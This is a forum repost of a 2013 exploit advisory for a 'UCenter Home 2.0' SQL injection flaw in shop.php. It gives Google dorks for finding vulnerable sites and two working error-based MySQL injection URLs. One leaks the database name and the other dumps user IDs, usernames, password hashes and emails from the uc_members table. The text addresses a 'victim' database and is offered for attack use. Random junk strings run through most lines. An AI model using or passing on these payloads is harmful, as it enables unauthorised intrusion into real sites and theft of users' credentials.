中国网络渗透测试联盟

标题: UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability [打印本页]
作者: admin    时间: 2013-2-27 21:31
标题: UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability
) [4 n+ Z( y: V' G) R
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__  1 d; @) U7 L1 @$ |/ g& l: g& a
! R% o# W" ?# `/ ?, g$ I) P
                                 
. t) `; q" e* U$ A: s) w; R
2 I6 m  W5 o+ x+ V/ U* i*/ Author : KnocKout  * G; Z8 Q' N  R0 N# e" u  ^: _

* `$ V! R- ~. Q+ [! @7 q! ?*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers  1 X/ [" |) [4 k% V9 O4 X9 O# a
5 d) w0 n- m" x1 |9 {4 [; W% t
*/ Contact: knockoutr@msn.com  
0 P9 i6 W8 N& o( `9 Z. c, D5 U# L& j! E3 d  H
*/ Cyber-Warrior.org/CWKnocKout  2 l+ u( \2 q! T0 d( f
( n; ^) c5 {& U- p
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  6 v  |4 @+ y4 u3 Y& S: k

3 ^2 K' k/ {6 V) C" RScript : UCenter Home  : d( A$ W  d, k& o3 |2 X
7 }( F0 B( k+ j  j% {* U
Version : 2.0  
- T5 G$ y- d6 A1 X9 `/ N+ E
' h$ {" F" S5 c% [" V% G7 IScript HomePage : http://u.discuz.net/  
5 N! t3 a1 W+ L$ _; w' C* q( ?& D0 ?; K  `  b1 t
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  ! m, e# S' P% t, \; [

8 r9 g/ T) D: i  ODork : Powered by UCenter inurl:shop.php?ac=view  
9 H4 @4 @8 s2 D( H
; {  `- d& k2 JDork 2 : inurl:shop.php?ac=view&shopid=  % y/ f% \1 t) Q9 T, k0 w$ U
- k5 c' k) ?- G- X5 o) I
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  
) E' a' q6 ~: g; }5 Z8 f- Z/ V% J
/ b- [4 ]4 K! W/ L: ?Vuln file : Shop.php  7 s7 T3 k; r# U: `

  y9 X2 j1 Z7 `% d  a8 Jvalue's : (?)ac=view&shopid=    z' L% _2 Z0 ?& W

3 D) [; P6 x# t8 jVulnerable Style : SQL Injection (MySQL Error Based)  
8 Y& E; P' t" W
9 r+ u( y( K! P4 S; l  N. s+ LNeed Metarials : Hex Conversion  1 R/ L6 k3 ~9 g

7 n8 `% }. I' N2 e" w, g* x__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  
6 T2 a7 g3 d- M/ q* d0 R+ @  v$ I- J; G$ D
Your Need victim Database name.   
* Z' g9 K$ b  B" ?% K+ @5 F5 B; x7 w) L+ s7 L7 E
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1  4 N8 w! d  m3 X5 o' d# \
' i8 r, T6 x) F
..  ( L8 y; N/ J5 x& |

& D+ C4 R( a) d& D' A/ g! ?DB : Okey.  
9 V: C! p4 H% R/ P3 ?% a
1 H- b$ g/ W6 c1 E( T0 q3 `. Zyour edit DB `[TARGET DB NAME]`  
5 w# T% Q$ N6 T( i4 w9 e0 K6 r( ^8 R
Example : 'hiwir1_ucenter'  
& N9 A! }, G! w, P. B% c) g" s; I* U
Edit : Okey.  4 R8 t( j! k+ }9 s

& A  N( I1 Y8 Y) j- {8 V  `  lYour use Hex conversion. And edit Your SQL Injection Exploit..  * P2 s5 A6 n9 \" L) N6 ^9 m
4 _" Q6 {5 d& \  ~* E9 p8 U2 e
   ! I/ A; m3 N" {8 \
5 o! j2 @: k' ~3 L% i; H7 w
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1  $ G3 D, b! h9 h8 e6 ^: Q3 {




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2